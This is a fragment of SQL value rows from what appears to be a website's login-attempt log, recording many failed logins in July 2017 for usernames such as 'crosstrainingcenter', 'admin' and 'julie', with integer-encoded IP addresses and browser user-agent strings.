(104015, 1500207964.705086, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887846670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104016, 1500208284.073077, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3547897544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104017, 1500208285.866019, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3547897544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104018, 1500208772.728638, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3129679397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104019, 1500208774.164454, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3129679397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104020, 1500209697.614346, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1364910579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104021, 1500209699.236077, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1364910579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104022, 1500212468.351752, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1550988330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104023, 1500212470.443084, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1550988330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104024, 1500212811.692938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1436185340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104025, 1500212812.904317, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1436185340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104026, 1500213888.908367, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976909362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104027, 1500213890.682758, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976909362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104028, 1500214588.959447, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398302038, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104029, 1500214590.336552, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398302038, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104030, 1500214765.310816, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(104031, 1500215770.996268, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1728410209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104032, 1500215772.586173, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1728410209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104033, 1500216217.614990, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3316022973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104034, 1500216221.012182, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3316022973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104035, 1500219178.058045, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.85.38 (KHTML, like Gecko) Chrome/57.4.9761.4033 Safari/534.56 OPR/44.5.0484.6756'),
(104036, 1500219574.941398, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2565749885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104037, 1500219576.542395, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2565749885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104038, 1500224743.822704, 1, 'loginFailValidUsername', 'julie', 2, 584188065, ''),
(104039, 1500226922.320648, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3153775560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104040, 1500226923.636283, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3153775560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104041, 1500231366.100578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498190932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104042, 1500231367.149272, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498190932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104043, 1500237976.944825, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 999430761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104044, 1500237979.212023, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 999430761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104045, 1500239419.124303, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065601545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104046, 1500239421.986335, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065601545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104047, 1500242924.224457, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104048, 1500242927.134512, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104049, 1500244976.938946, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(104050, 1500250374.515837, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3191277877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104051, 1500250377.617445, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3191277877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104052, 1500252402.582817, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3143998148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104053, 1500252404.025986, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3143998148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104054, 1500253099.197705, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549953834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104055, 1500253100.432921, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549953834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104056, 1500254720.679948, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3044121415, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104057, 1500261311.491772, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3172634165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104058, 1500261313.382723, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3172634165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104059, 1500262904.379880, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976064904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104060, 1500262905.888822, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976064904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104061, 1500264744.904461, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887841908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104062, 1500268296.876012, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201981880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104063, 1500268298.397193, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201981880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104064, 1500270082.689826, 1, 'loginFailValidUsername', 'julie', 2, 585330554, ''),
(104065, 1500270994.878621, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.07.54 (KHTML, like Gecko) Chrome/57.5.0510.4248 Safari/534.47'),
(104066, 1500271105.713214, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2002609969, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104067, 1500271110.595954, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2002609969, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104068, 1500278723.890840, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1677850360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104069, 1500278725.052621, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1677850360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104070, 1500279656.562775, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3641833641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104071, 1500279657.824465, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3641833641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104072, 1500280257.987741, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1238881600, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104073, 1500280259.124490, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1238881600, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104074, 1500280605.124328, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1567078369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104075, 1500280606.114925, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1567078369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104076, 1500280794.997943, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3121494397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104077, 1500280796.836435, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3121494397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104078, 1500281272.232564, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90616773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104079, 1500281273.298684, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90616773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104080, 1500281762.131788, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539428482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104081, 1500283512.520646, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023279659, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104082, 1500283514.597126, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023279659, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104083, 1500284428.042579, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702634471, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104084, 1500284429.205862, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702634471, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104085, 1500284965.376208, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3647166437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104086, 1500284966.756071, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3647166437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104087, 1500287265.747147, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2934048583, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104088, 1500287267.266984, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2934048583, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104089, 1500287387.245600, 1, 'loginFailValidUsername', 'admin', 1, 406012892, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104090, 1500287389.011607, 1, 'loginFailValidUsername', 'admin', 1, 3661372542, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104091, 1500287389.525549, 1, 'loginFailValidUsername', 'admin', 1, 3363691618, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104092, 1500287389.925735, 1, 'loginFailValidUsername', 'admin', 1, 1600667056, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104093, 1500287741.100191, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768723942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104094, 1500287742.130755, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768723942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104095, 1500288499.213331, 1, 'loginFailValidUsername', 'admin', 1, 989113730, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104096, 1500289511.367873, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1776516961, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104097, 1500289512.916623, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1776516961, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104098, 1500291333.631647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1015060933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104099, 1500291335.021899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1015060933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104100, 1500297109.502132, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(104101, 1500297337.709285, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3303032786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104102, 1500297340.243670, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3303032786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104103, 1500298923.572929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503318595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104104, 1500298924.585796, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503318595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104105, 1500299039.416750, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1334918886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104106, 1500299040.396828, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1334918886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104107, 1500299554.925159, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1843600622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104108, 1500299556.202867, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1843600622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104109, 1500302706.900357, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1347764095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104110, 1500302708.024956, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1347764095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104111, 1500303701.445051, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1570079581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104112, 1500303703.142249, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1570079581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104113, 1500306310.130996, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050256701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104114, 1500306311.746578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050256701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104115, 1500308583.327764, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1518783841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104116, 1500308584.469380, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1518783841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104117, 1500309765.419300, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2973166485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104118, 1500309767.003716, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2973166485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104119, 1500309962.255546, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424761973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104120, 1500309963.279179, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424761973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104121, 1500310297.624932, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1309579320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104122, 1500310298.638926, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1309579320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104123, 1500310605.674102, 1, 'loginFailValidUsername', 'julie', 2, 874738092, ''),
(104124, 1500314583.869415, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729078788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104125, 1500316805.526597, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1370255902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104126, 1500316807.031154, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1370255902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104127, 1500317137.174677, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3356027048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104128, 1500317141.745605, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3356027048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104129, 1500320577.137675, 1, 'loginFailValidUsername', 'julie', 2, 911647748, ''),
(104130, 1500323287.347939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981497232, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104131, 1500323289.017497, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981497232, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104132, 1500323355.306369, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.84.31 (KHTML, like Gecko) Version/5.2.7 Safari/530.76'),
(104133, 1500323669.791723, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443531046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104134, 1500323671.690691, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443531046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104135, 1500326083.772927, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3164695660, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104136, 1500333062.012636, 1, 'loginFailValidUsername', 'julie', 2, 874738092, ''),
(104137, 1500333219.666855, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 94241165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104138, 1500333226.238740, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 94241165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104139, 1500336190.930708, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833095966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104140, 1500336192.013734, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833095966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104141, 1500336641.180615, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549964316, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104142, 1500336642.369132, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549964316, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104143, 1500338407.316794, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3138378692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104144, 1500338408.945732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3138378692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104145, 1500340044.025994, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3292600061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104146, 1500340045.575188, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3292600061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104147, 1500342969.114473, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3701254369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104148, 1500342970.911621, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3701254369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104149, 1500346158.926443, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1855096721, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104150, 1500346278.443184, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1237999338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104151, 1500348963.777738, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147820056, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104152, 1500348968.180343, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147820056, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104153, 1500350252.906197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3091977507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104154, 1500350254.421018, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3091977507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104155, 1500356771.728656, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1295071211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104156, 1500356772.802874, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1295071211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104157, 1500356851.851447, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2119415321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104158, 1500356853.270304, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2119415321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104159, 1500357164.319460, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1386744982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
